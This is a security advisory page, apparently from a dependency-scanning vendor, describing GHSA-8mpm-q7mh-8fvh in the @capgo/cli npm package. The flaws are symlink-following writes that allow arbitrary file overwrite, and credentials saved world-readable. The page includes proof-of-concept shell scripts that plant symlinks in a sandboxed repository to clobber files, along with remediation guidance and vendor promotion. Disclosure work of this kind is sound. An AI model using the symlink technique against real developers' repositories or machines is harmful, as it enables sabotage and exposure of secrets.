How severe is GHSA-8mpm-q7mh-8fvh?

No CVSS score has been assigned to GHSA-8mpm-q7mh-8fvh yet. Review the advisory details and affected package list to assess your exposure.

Which packages are affected by GHSA-8mpm-q7mh-8fvh?

GHSA-8mpm-q7mh-8fvh affects the following packages: @capgo/cli (npm). Ecosystems affected: npm.

How do I fix GHSA-8mpm-q7mh-8fvh?

Update @capgo/cli to 7.84.6 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-8mpm-q7mh-8fvh is resolved across your whole dependency graph.

How do I detect GHSA-8mpm-q7mh-8fvh in my npm dependencies?

Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for @capgo/cli. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

How do I mitigate GHSA-8mpm-q7mh-8fvh if there is no patch (or I can't update yet)?

If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

How does O3 Security protect against GHSA-8mpm-q7mh-8fvh?

O3 pinpoints whether GHSA-8mpm-q7mh-8fvh is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Is GHSA-8mpm-q7mh-8fvh actively exploited in the wild?

No public exploit code has been indexed for GHSA-8mpm-q7mh-8fvh yet. This does not mean the vulnerability cannot be exploited — absence of public exploits does not imply safety. Apply the recommended fix and use O3 Security to monitor your exposure.

When was GHSA-8mpm-q7mh-8fvh published, and has it been updated?

GHSA-8mpm-q7mh-8fvh was published on March 18, 2026 and was last updated on March 18, 2026. Advisory data evolves as severity scores, affected ranges, and exploit intelligence are revised — always check the latest version of the advisory before acting.

📦 npm

GHSA-8mpm-q7mh-8fvh

Capgo CLI: symlink-following local secret writes enable arbitrary file overwrite + world-readable credentials (0600 missing)

Published

Mar 18, 2026

Updated

Mar 18, 2026

Affected

1 pkg

Patched

1 / 1

Exploits

None indexed

Blast Radius

1 pkg affected

📦@capgo/cli

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects npm packages — download data is not available via public APIs for these ecosystems.

Description

Summary

The Capgo CLI writes sensitive local files (.capgo API key file and build credentials JSON) using unsafe file operations that follow symlinks and do not enforce safe permissions. This allows an attacker-controlled repository to cause arbitrary file overwrite on the developer’s machine when the developer runs the CLI inside that repo. Additionally, global build credentials are written with world-readable permissions (664), exposing signing materials on shared systems.

Details

Issue 1 - Arbitrary file overwrite via .capgo symlink (login --local)

Location: src/login.ts
Behavior: loginInternal(..., { local: true }) performs writeFileSync('.capgo', ...) before validating the API key with verifyUser().
No checks are performed to prevent writing through a symlink.
Result: if .capgo is a symlink to an arbitrary path, the CLI overwrites the symlink target with attacker-controlled content (the provided API key string), even when login fails.

Issue 2 - Arbitrary file overwrite via .capgo-credentials.json symlink (build credentials save --local)

Location: src/build/credentials.ts (local path is join(cwd(), '.capgo-credentials.json'))
Behavior: credentials are written using writeFile() without checking whether the destination is a symlink.
Result: if .capgo-credentials.json is a symlink to an arbitrary path, the CLI overwrites the symlink target with attacker-controlled JSON (including base64-encoded credential material). This occurs even if the user is not logged in / no API key exists.

Issue 3 - Insecure default permissions for global credentials

Location: src/build/credentials.ts (global path $HOME/.capgo-credentials/credentials.json)
Observed permissions after save: -rw-rw-r-- (664)
Impact: credentials file contains sensitive signing material (e.g., Android keystore + Play config; iOS cert/profile/API key in other flows). World/group readability is unsafe on shared hosts and CI runners. Expected minimum: file 0600, directory 0700.

PoC

PoC A: .capgo symlink clobber (writes even when API key invalid)

set -euo pipefail
BASE="/tmp/capgo_cli_poc_$(date +%s)"
HOME_SANDBOX="$BASE/home"
REPO="$BASE/repo"
TARGET="$BASE/clobbered.txt"

mkdir -p "$HOME_SANDBOX" "$REPO"
cd "$REPO"
git init -q

ln -s "$TARGET" .capgo

# This should fail auth, but still overwrites TARGET
HOME="$HOME_SANDBOX" npx --yes @capgo/[email protected] login "INVALID_KEY_SHOULD_FAIL" --local || true

echo "== TARGET content =="
cat "$TARGET"

Expected: On invalid key, nothing is written; .capgo should never follow symlinks. Observed: TARGET contains INVALID_KEY_SHOULD_FAIL.

PoC B: .capgo-credentials.json symlink clobber (no login required)

set -euo pipefail
BASE="/tmp/capgo_creds_symlink_$(date +%s)"
HOME_SANDBOX="$BASE/home"
REPO="$BASE/repo"
TARGET="$BASE/clobbered_creds.txt"

mkdir -p "$HOME_SANDBOX" "$REPO"
cd "$REPO"
git init -q

ln -s "$TARGET" .capgo-credentials.json

HOME="$HOME_SANDBOX" npx --yes @capgo/[email protected] build credentials save \
  --local --platform android --appId com.example.app \
  --keystore /etc/hosts --keystore-alias x --keystore-key-password x --play-config /etc/hosts || true

echo "== TARGET exists and contains JSON written via symlink =="
ls -la "$TARGET" || true
cat "$TARGET" || true

Expected: Refuse to write if destination is symlink; ideally require safe location and permissions. Observed: TARGET is created/overwritten with credentials JSON.

PoC C: global credentials permissions are world-readable

set -euo pipefail
BASE="/tmp/capgo_creds_perm_$(date +%s)"
HOME_SANDBOX="$BASE/home"
mkdir -p "$HOME_SANDBOX"

HOME="$HOME_SANDBOX" npx --yes @capgo/[email protected] build credentials save \
  --platform android --appId com.example.app \
  --keystore /etc/hosts --keystore-alias x --keystore-key-password x --play-config /etc/hosts || true

CREDS="$HOME_SANDBOX/.capgo-credentials/credentials.json"
ls -la "$CREDS" || true
stat -c '%a %U:%G %n' "$CREDS" || true

Observed: credentials.json created with mode 664 (-rw-rw-r--).

Impact

Arbitrary file overwrite (clobber) as the user running the CLI (developer workstation / CI runner).
This can cause:

developer environment compromise or sabotage (overwriting config files, scripts, env files) accidental or malicious leakage/destruction of secrets

Local secret exposure: global credentials written as 664 allows other local users to read signing material on shared machines.
A realistic scenario: a developer runs npx @capgo/cli ... --local inside an untrusted repo/template; the repo contains malicious symlinks.

Suggested remediation

Do not write .capgo until after API key validation succeeds.
For all secret/config writes:

refuse symlink destinations (lstat + isSymbolicLink) use safe file creation and enforce permissions (0600 for files; 0700 for directories) write atomically (temp file + rename) after safety checks

Avoid blindly appending to .gitignore unless it is a regular file (also check for symlink).

Affected Packages

1 total 1 fixed

Ecosystem	Package	Vulnerable range	Fix
📦npm	`@capgo/cli`	all versions	7.84.6

Detection & mitigation playbook

Open-source dependency

Detect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for @capgo/cli. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update @capgo/cli to 7.84.6 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-8mpm-q7mh-8fvh is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-8mpm-q7mh-8fvh is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-8mpm-q7mh-8fvh. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Summary The Capgo CLI writes sensitive local files (.capgo API key file and build credentials JSON) using unsafe file operations that follow symlinks and do not enforce safe permissions. This allows an attacker-controlled repository to cause arbitrary file overwrite on the developer’s machine when the developer runs the CLI inside that repo. Additionally, global build credentials are written with world-readable permissions (664), exposing signing materials on shared systems. ### Details Issue 1 - Arbitrary file overwrite via .capgo symlink (login --local) - Location: src/login.ts - Behav

O3 Security · Impact-Aware SCA

Is GHSA-8mpm-q7mh-8fvh in your dependencies?

O3 detects GHSA-8mpm-q7mh-8fvh across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works